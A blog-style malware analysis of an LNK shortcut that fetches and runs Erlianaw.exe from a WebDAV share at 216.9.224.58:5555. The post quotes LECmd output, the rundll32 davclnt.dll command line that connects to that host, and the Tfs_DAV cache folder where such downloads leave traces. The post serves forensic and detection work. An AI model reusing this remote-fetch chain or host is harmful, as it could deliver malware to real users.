Today I Learned - WebDAV Cache
Table of Contents
Introduction
User @karol_paciorek recently tweeted about an open directory containing malware, depicted in Figure 1. You can find the original post here:
Along with the MS_calendar.lnk file mentioned in the tweet from @karol_paciorek, there are additional files publicly available on that server:
LNK Analysis
We will examine the LNK file schedule.lnk (MD5: 62d5389d43931237e9d3d1aa77c87483), located in the same directory as the MS_calendar.lnk file. To analyze it, we will use LECMD.exe, a handy tool developed by Eric Zimmermann.
C:\Users\malmoeb\Downloads>LECmd.exe -f schedule.lnk
LECmd version 1.5.0.0
Author: Eric Zimmerman (saericzimmerman@gmail.com)
https://github.com/EricZimmerman/LECmd
Command line: -f schedule.lnk
Processing C:\Users\malmoeb\Downloads\schedule.lnk
Source file: C:\Users\malmoeb\Downloads\schedule.lnk
Source created: 2024-08-06 07:51:47
Source modified: 2024-08-06 07:51:47
Source accessed: 2024-08-06 07:52:08
--- Header ---
Target created: 2024-08-04 23:17:22
Target modified: 2024-07-01 03:33:05
Target accessed: 2024-07-01 03:33:05
File size (bytes): 101,888
Flags: HasLinkInfo, HasRelativePath, HasWorkingDir, HasIconLocation, IsUnicode, HasExpString, EnableTargetMetadata
File attributes: FileAttributeArchive
Icon index: 0
Show window: SwShowminnoactive (Display the window as minimized without activating it.)
Relative Path: .\Erlianaw.exe
Working Directory: \\216.9.224.58@5555\DavWWWRoot\files
Icon Location: \\216.9.224.58@5555\DavWWWRoot\files\fold.ico
--- Link information ---
Flags: CommonNetworkRelativeLinkAndPathSuffix
Network share information
Share name: \\216.9.224.58@5555\DAVWWWROOT
Provider type: WnncNetDav
Share flags: ValidNetType
Common path: files\Erlianaw.exe
--- Extra blocks information ---
>> Property store data block (Format: GUID\ID Description ==> Value)
dabd30ed-0043-4789-a7f8-d013a4736622\100 Item Folder Path Display Narrow ==> files (\\216.9.224.58@5555\DavWWWRoot)
b725f130-47ef-101a-a5f1-02608c9eebac\10 Item Name Display ==> Erlianaw.exe
b725f130-47ef-101a-a5f1-02608c9eebac\15 Date Created ==> 08/04/2024 23:17:22
b725f130-47ef-101a-a5f1-02608c9eebac\12 Size ==> 101888
b725f130-47ef-101a-a5f1-02608c9eebac\4 Item Type Text ==> Application
b725f130-47ef-101a-a5f1-02608c9eebac\14 Date Modified ==> 07/01/2024 03:33:05
28636aa6-953d-11d2-b5d6-00c04fd918d0\30 Parsing Path ==> \\216.9.224.58@5555\DavWWWRoot\files\Erlianaw.exe
By analyzing this LNK file (the full output from LECmd.exe is depicted above), we can identify the next stage in the infection chain that would be downloaded to the victim host upon executing this LNK file:
Relative Path: .\Erlianaw.exe
Working Directory: \\216.9.224.58@5555\DavWWWRoot\files
WebDAV Connection
As already explained in an earlier blog post (Abusing the “search-ms” URI protocol handler), WebDAV connections are carried out via a DLL that is started with rundll32.exe:
CommandLine:
rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie
216.9.224.58@5555 http://216.9.224.58:5555/
The user agent utilized for this WebDAV connection is noteworthy:
Didier Stevens described and investigated this user agent years ago. For organizations proxying their traffic, you might want to monitor this user agent.
Sysmon
While analyzing the Sysmon logs, I stumbled upon something interesting.
File created:
TargetFilename:
C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\TfsStore\Tfs_DAV\{CACAF1F7-CE7C-4CA2-B9E3-ABBC9F6E965D}.exe
What the heck is this \TfsStore\Tfs_DAV\ directory and the executable {CACAF1F7-CE7C-4CA2-B9E3-ABBC9F6E965D}.exe in it? As it turns out, these files could provide evidence of files retrieved from remote WebDav server(s) to the local system, at least temporarily.
Tfs_DAV
And sure enough, the MD5 of the file {CACAF1F7-CE7C-4CA2-B9E3-ABBC9F6E965D}.exe maps to a file on VirusTotal named Erlianaw.exe, the filename we saw earlier during the analysis of the LNK file.
Late to the party
It looks like I’m late to the party, though :) @enigma0x3 already discussed in 2017 that files executed via WebDAV are copied locally to TfsStore\Tfs_DAV folder.
And, another interesting fact, @SBousseaden mentioned that .url files in the AppData\Local\Temp\TfsStore\Tfs_DAV cache folder might contain the URL from where the downloaded files come from (referencing CVE_2024_21412).
Once again, standing on the shoulds of giants.
What I learned today: Short blog posts about novel information for me.